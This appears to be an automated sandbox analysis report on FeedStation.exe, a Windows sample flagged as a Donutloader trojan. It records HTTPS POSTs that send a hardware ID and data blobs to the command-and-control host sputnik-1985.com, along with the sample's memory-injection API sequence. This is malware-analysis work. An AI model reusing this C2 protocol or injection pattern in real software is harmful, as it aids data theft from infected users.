2025-01-10 10:59:18 UTC	1124	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7aup5lo3ets89kjgkg8p1a3ium; expires=Tue, 06 May 2025 04:45:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgPChXca9txS%2BO26OAmKdM9FEvzTBE4n5CWb2HgZs07uu3MnzIH5DTGs2LpD7a2mWwylCuM41Oeh0uqRye9wMUTuRSU%2BgHqPOeSv8ZguxV9KdU%2Fbt3uuTPICegK9hz370wX1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc28233c10424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1686&rtt_var=635&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13782&delivery_rate=1719670&cwnd=248&unsent_bytes=0&cid=0664be8af27a93d6&ts=526&x=0"
2025-01-10 10:59:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:59:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49807	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:18 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3E7H6T7CJBZE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15048 Host: sputnik-1985.com
2025-01-10 10:59:18 UTC	15048	OUT	Data Raw: 2d 2d 33 45 37 48 36 54 37 43 4a 42 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 33 45 37 48 36 54 37 43 4a 42 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 45 37 48 36 54 37 43 4a 42 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 33 45 37 48 36 54 37 Data Ascii: --3E7H6T7CJBZEContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--3E7H6T7CJBZEContent-Disposition: form-data; name="pid"2--3E7H6T7CJBZEContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--3E7H6T7
2025-01-10 10:59:19 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rkckn79162ovkq9ei90mppm1qe; expires=Tue, 06 May 2025 04:45:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npREztTnzyUxewpqQ1LyW7MCrWDcl2VFHPI%2BAY7FqjX%2FBKvj9KFLrGl3rrQ14raJIVFsETPwAb%2BLciEYXYZc4e4w2IoMImBeBVEp%2BY3M%2BIeSqnkDf6NTxqibvUDpteOKlYui"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc282a9954729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1944&rtt_var=739&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15982&delivery_rate=1471774&cwnd=169&unsent_bytes=0&cid=03e1654e950bb321&ts=516&x=0"
2025-01-10 10:59:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:59:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49819	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:20 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8C5WVK0D5HPZHE5XL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: sputnik-1985.com
2025-01-10 10:59:20 UTC	15331	OUT	Data Raw: 2d 2d 38 43 35 57 56 4b 30 44 35 48 50 5a 48 45 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 38 43 35 57 56 4b 30 44 35 48 50 5a 48 45 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 43 35 57 56 4b 30 44 35 48 50 5a 48 45 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 Data Ascii: --8C5WVK0D5HPZHE5XLContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--8C5WVK0D5HPZHE5XLContent-Disposition: form-data; name="pid"3--8C5WVK0D5HPZHE5XLContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419
2025-01-10 10:59:20 UTC	5237	OUT	Data Raw: af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2025-01-10 10:59:20 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hq7r1jbkv23gfor90p8s8lf37u; expires=Tue, 06 May 2025 04:45:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSygYH9ilQZcmG7jh6n7KYvltWNFV6deHfUN1jtGbtuHhYiOLswxF2VDE%2FoQKbOvnXpEX9SMTr97WE0cwuef8fsG3Q0TiWKkP%2F%2B8PhKG3kY%2Bk%2B9z%2FYy1bfWr5BBuolqb7auv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc28348ec2727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1957&rtt_var=739&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21529&delivery_rate=1474747&cwnd=234&unsent_bytes=0&cid=d12089b94d00b63a&ts=602&x=0"
2025-01-10 10:59:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:59:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49829	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:21 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=46HK5RMUNY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1226 Host: sputnik-1985.com
2025-01-10 10:59:21 UTC	1226	OUT	Data Raw: 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 Data Ascii: --46HK5RMUNYContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--46HK5RMUNYContent-Disposition: form-data; name="pid"1--46HK5RMUNYContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--46HK5RMUNYC
2025-01-10 10:59:22 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ds4hl3e45o79njpnv7v5grbimo; expires=Tue, 06 May 2025 04:46:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRJGJj4Zl2E36YAI9fyG%2F5n2wWuZtumm8o%2BpbqkB19SNL42ED1gRbiY%2FHPF6ATLVO0FUw6m50TkTRyadeCx7S3T3w%2FKNYWHcx5VshBOSB4N6I56mmYzoV%2BxJkoDK316TAUYg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc283d1e0e43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1538&rtt_var=604&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2135&delivery_rate=1771844&cwnd=203&unsent_bytes=0&cid=2a47f195d6fd1590&ts=754&x=0"
2025-01-10 10:59:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:59:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49840	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:23 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6WJTG6236WX8E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1101 Host: sputnik-1985.com
2025-01-10 10:59:23 UTC	1101	OUT	Data Raw: 2d 2d 36 57 4a 54 47 36 32 33 36 57 58 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 36 57 4a 54 47 36 32 33 36 57 58 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 57 4a 54 47 36 32 33 36 57 58 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 36 57 4a 54 Data Ascii: --6WJTG6236WX8EContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--6WJTG6236WX8EContent-Disposition: form-data; name="pid"1--6WJTG6236WX8EContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--6WJT
2025-01-10 10:59:23 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nnmvdfj8ok2n8befsf3j58pnls; expires=Tue, 06 May 2025 04:46:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2F6Hz2M6H5UmFbNIH24djNmZ%2FWSp7SZmf229TIAVoN0msjI1tLgYgdblKi%2Bbq5dZ7%2B9Byj2lHvzT%2Bq6eGk0F7sUhI9%2FuAAYePVErVX9WaMKk2Ew7jU7L4y3buZX5mv73DdlQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc28469cba424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1543&rtt_var=591&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2013&delivery_rate=1830721&cwnd=248&unsent_bytes=0&cid=77c066cdeddd413c&ts=540&x=0"
2025-01-10 10:59:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:59:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49847	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: sputnik-1985.com
2025-01-10 10:59:24 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=DCEA30ECA0458572477F99C241D3C921
2025-01-10 10:59:24 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kkimt1tlkgad6n173daoqe07l4; expires=Tue, 06 May 2025 04:46:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yETrDSMsPREnFoRuvR5tAdnjh46YtNNAhsmWavcgifml5OCdWWFgEF64%2BC7gTbXAeyrzL%2Bm7MiXGrRzqJTe24Z4wYJQbM%2F4J20JC6rwdy6xjQnR7EoT6H2LWz4zEjU63POA8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc284d5cdec34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1454&min_rtt=1448&rtt_var=555&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1951871&cwnd=181&unsent_bytes=0&cid=8ddd4192f1d265e2&ts=511&x=0"
2025-01-10 10:59:24 UTC	54	IN	Data Raw: 33 30 0d 0a 75 36 70 46 30 55 62 76 68 51 5a 72 38 6c 65 47 4a 74 53 5a 41 70 57 4b 76 4e 61 54 35 4b 76 53 31 61 49 65 6c 2b 4d 54 46 64 62 67 39 77 3d 3d 0d 0a Data Ascii: 30u6pF0UbvhQZr8leGJtSZApWKvNaT5KvS1aIel+MTFdbg9w==
2025-01-10 10:59:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:58:57
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\FeedStation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FeedStation.exe"
Imagebase:	0x500000
File size:	2'000'360 bytes
MD5 hash:	256A1CCEC403335433630F6824E081DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	36.7%
Total number of Nodes:	128
Total number of Limit Nodes:	14

Executed Functions

Function 0252FC1A Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0252FCB3
NtMapViewOfSection.NTDLL(?,00000000), ref: 0252FD5B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 025300CF
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02530184
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 025301A1
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02530244
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02530277
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 025303E8

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
Instruction ID: e05881c72dd41c0ac701657eab3f8eac9a8cb3df16af08e7411f184964262ca0
Opcode Fuzzy Hash: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
Instruction Fuzzy Hash: 8F429A71608311AFDB25CF24C844B6BBBE9FF88714F04592DF9899B281E730E945CB95

Function 024E0E75 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,024E09BB,?,00000001,?,81EC8B55,000000FF), ref: 024E0EB3
Thread32First.KERNEL32(00000000,0000001C), ref: 024E0EDF
Wow64SuspendThread.KERNEL32(00000000), ref: 024E0F32
CloseHandle.KERNEL32(00000000), ref: 024E0F5C

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 1923fef6226d699df834783176e8e38aa3c20cc328af0cc6c116a873d4128778
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: EA410071A00109AFDB18DF98C490BAEB7F6EF88300F10C169E6169B794DB74EE45CB55

Function 024E0D25 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 024E0DF1

Strings

,, xrefs: 024E0E3D

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 41fdac1bb77d5538c96166b8d8f9de73fc738b00082b5b7491cfd33669705a2e
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 6541D774A00209EFDB14DF98C994BAEB7B1FF48315F2081A9D5166B380C775AE81CF94

Function 024E0765 Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 024E0A08

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 55b8e2d1dc4a6f8256d26a117e56ad450ce356ed9e4239e88acab8a67bca37ac
Instruction ID: 1eb2bbf240ca7cd80948fd20d30088498a44fc3c2f36431ec24ba53b96d94266
Opcode Fuzzy Hash: 55b8e2d1dc4a6f8256d26a117e56ad450ce356ed9e4239e88acab8a67bca37ac
Instruction Fuzzy Hash: 2312B4B0E00219DFEB14CF98C990BAEBBB1FF48305F2482A9D516AB385D7746A45CF54

Function 0252E67A Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02530898: LoadLibraryA.KERNEL32(00000000,?,?), ref: 0253092A

VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 0252E6D5
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 0252E708
VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 0252E73B
VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 0252E765

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
Instruction ID: c307eaa00d6a419bb07c84a718e96dc1121d9159f93e490be2cc9ef5fcbecd83
Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
Instruction Fuzzy Hash: C721B77210435A7FE310BA618D85FB7779DEB87704F04083ABB46D10D1E765B5098679

Function 0252F4EA Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0252F564
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0252F8A8
RtlExitUserProcess.NTDLL(00000000), ref: 0252F8B1

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: Virtual$AllocExitFreeProcessUser
String ID:
API String ID: 1828502597-0
Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
Instruction ID: 1e9d581a0d41e67f4a5aadc47e68ad7fa0074864b774dfbb3e25679510d3e12e
Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
Instruction Fuzzy Hash: 05B12532500712ABDB259F60EC80BABFBF9FF46314F240529E549829D0E731F559CB99

